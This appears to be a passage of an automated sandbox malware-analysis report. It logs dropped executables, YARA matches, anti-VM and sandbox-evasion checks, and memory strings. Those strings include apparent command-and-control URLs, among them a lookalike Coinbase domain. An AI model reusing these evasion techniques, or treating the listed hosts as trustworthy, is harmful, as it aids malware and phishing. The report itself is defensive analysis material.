                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: relog.exeBinary or memory string: PROCESSHACKER.EXE
                      Source: relog.exe, 00000035.00000002.2761180327.00007FF7AE4A6000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTXK
                      Source: xj40xovMsm.exe, 00000000.00000002.1763287432.0000020234D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.E
                      Source: xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.drBinary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX
                      Source: xj40xovMsm.exe, 00000019.00000002.2618262946.00000229BA940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX
                      Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe.2.dr, svchost.exe.14.dr, 5087.tmp.update.exe.2.dr, 4336.tmp.Server.exe.2.dr, 53A5.tmp.update.exe.2.drBinary or memory string: SBIEDLL.DLL
                      Source: relog.exe, 0000002F.00000002.2609836968.00007FF6AA356000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: NUCLEARBOTEXPLORER.EXE\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{%08LX%04LX%LU}.EXEMOZILLA 5/0.LNK\WINSERVER\*....EXE\SERVICE_SERVICE_HTTPS://AUTH.XN--CONBASE-SFB.XYZ/EVENT.PHPHTTPS://EXCHANGER.INK/EVENT.PHPSYSTEMUPDATE.EXETASKMGR.EXEPROCESSHACKER.EXEFIREFOX.EXECHROME.EXECHROME.EXEMSEDGE.EXEMSEDGE.EXEZBIUNKNOWNRELOG.EXEBAD CASTX6
                      Source: 5E16.tmp.aaa.exe, 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, 5E16.tmp.aaa.exe.2.drBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeMemory allocated: 16A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeMemory allocated: 1B2C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeMemory allocated: 860000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeMemory allocated: 24A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeMemory allocated: 44A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeMemory allocated: C60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeMemory allocated: 2900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeMemory allocated: 4900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeMemory allocated: 1130000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeMemory allocated: 2FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                      Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: EA0000 memory reserve | memory write watch
                      Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 1AA10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeMemory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeMemory allocated: 2930000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeMemory allocated: 2830000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeMemory allocated: 730000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeMemory allocated: 2260000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeMemory allocated: 8D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeMemory allocated: B60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeMemory allocated: 1A7C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeMemory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeMemory allocated: 2DD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeMemory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 4800000 memory reserve | memory write watch
                      Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: B40000 memory reserve | memory write watch
                      Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeMemory allocated: 880000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeMemory allocated: 24B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeMemory allocated: 23D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 33E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 33E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 53E0000 memory reserve | memory write watch
                      Source: C:\Windows\explorer.exeCode function: 2_2_08CB167C CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,FindCloseChangeNotification,OpenThread,SuspendThread,GetThreadContext,SetThreadContext,CloseHandle,FindCloseChangeNotification,2_2_08CB167C
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599562
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 599125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598929
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598718
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598515
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 598140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597953
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597621
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596757
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596578
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596390
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 596046
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593578
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593296
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 593125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 591156
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590968
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590778
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590593
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590375
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 590078
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589656
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589479
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589328
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 589140
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588993
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588765
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588600
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588343
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588187
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 588015
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587853
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587560
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587265
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 587125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586961
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586635
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 586218
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585984
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585750
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585585
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585421
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 585031
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584812
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584515
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 584203
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583843
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583531
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583307
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 583112
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582562
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582281
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 582078
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581921
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581687
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581423
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581258
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 581046
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580862
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580671
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580265
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 580077
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579875
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579709
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579492
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 579296
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578953
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578484
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 578078
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577734
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577484
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577341
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 577125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576937
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576703
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576468
